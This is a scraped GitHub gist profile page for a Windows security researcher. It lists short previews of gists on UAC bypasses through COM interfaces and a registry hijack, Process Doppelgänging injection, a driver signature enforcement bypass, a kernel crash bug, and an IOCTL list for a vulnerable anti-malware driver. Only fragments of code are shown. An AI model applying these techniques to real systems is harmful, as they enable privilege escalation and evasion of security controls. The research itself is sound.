Skip to content

Instantly share code, notes, and snippets.

View hfiref0x's full-sized avatar

hfiref0x

3.6k followers · 18 following
View GitHub Profile
@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / akagi_42b.c
Last active February 14, 2024 11:56
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@hfiref0x
hfiref0x / UpdateCompression.c
Created December 17, 2023 13:57
UpdateCompression raw dump
This file has been truncated, but you can view the full file.
unsigned char UCDLL[533840] = {
0x4D, 0x5A, 0x90, 0x00, 0x03, 0x00, 0x00, 0x00, 0x04, 0x00, 0x00, 0x00, 0xFF, 0xFF, 0x00, 0x00,
0xB8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21, 0x54, 0x68,
0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D, 0x20, 0x63, 0x61, 0x6E, 0x6E, 0x6F,
0x74, 0x20, 0x62, 0x65, 0x20, 0x72, 0x75, 0x6E, 0x20, 0x69, 0x6E, 0x20, 0x44, 0x4F, 0x53, 0x20,
0x6D, 0x6F, 0x64, 0x65, 0x2E, 0x0D, 0x0D, 0x0A, 0x24, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x51, 0x10, 0x99, 0x01, 0x15, 0x71, 0xF7, 0x52, 0x15, 0x71, 0xF7, 0x52, 0x15, 0x71, 0xF7, 0x52,
@hfiref0x
hfiref0x / gist:59c689a14f1fc2302d858ae0aa3f6b86
Created May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
@hfiref0x
hfiref0x / NtUserInitialize.c
Last active August 8, 2023 07:27
Windows 11 Next-Gen (24H2) NtUserInitialize BSOD
/*
Windows 11 builds starting from 259XXX (24H2) switched to new way of storing win32k global variables, using WIN32KSGD.sys
driver which now allocates huge structure where it hold a lot of session related information, apiset tables etc.
However due to heavy remake there are new bugs introduced - one of it is a BSOD generator inside win32kbase!Win32kBaseUserInitialize
(which is ultimate destination of apiset obscure NtUserInitialize call).
What they did is removed a check if USER was already initialized, thus every code calling NtUserInitialize will go further and lay into
TCB privileges checking part which of course will fail in 99.99% situations and cause Windows to do bugcheck 0x91
WIN32K_INIT_OR_RIT_FAILURE.
@hfiref0x
hfiref0x / 1.c
Created June 16, 2023 14:58
__int64 __fastcall CiQueryInformation(
SYSTEM_CODEINTEGRITY_INFORMATION *CodeIntegrityInformation,
unsigned int CodeIntegrityInformationLength,
char SeILSigningPolicyNotUnchecked,
_DWORD *ReturnLength)
{
unsigned int v8; // esi
__int64 v9; // r8
int CodeIntegrityOptions; // ecx
int v11; // edx
@hfiref0x
hfiref0x / zam.md
Created February 26, 2020 06:52
MalwareFox ZAM backdoor IOCTL list

ZAM64.SYS (ZAMGUARD64.SYS) most interesting IOCTLs.

All parameters to the functions supplied from user-mode via DeviceIoControl parameters. Everything from this available for any local user on machine where this driver is running.

0x8000202C

Arbitrary file deletion. Resets file attributes via ZwSetInformationFile and then does ZwDeleteFile.

0x80002030

Wrapper around ZwQuerySystemInformation(SystemProcessInformation).

@hfiref0x
hfiref0x / inject.c
Last active May 31, 2023 16:23
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@hfiref0x
hfiref0x / main.c
Last active May 15, 2023 17:33
NtLoadEnclaveData Windows 10 RS3 DSE bypass
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;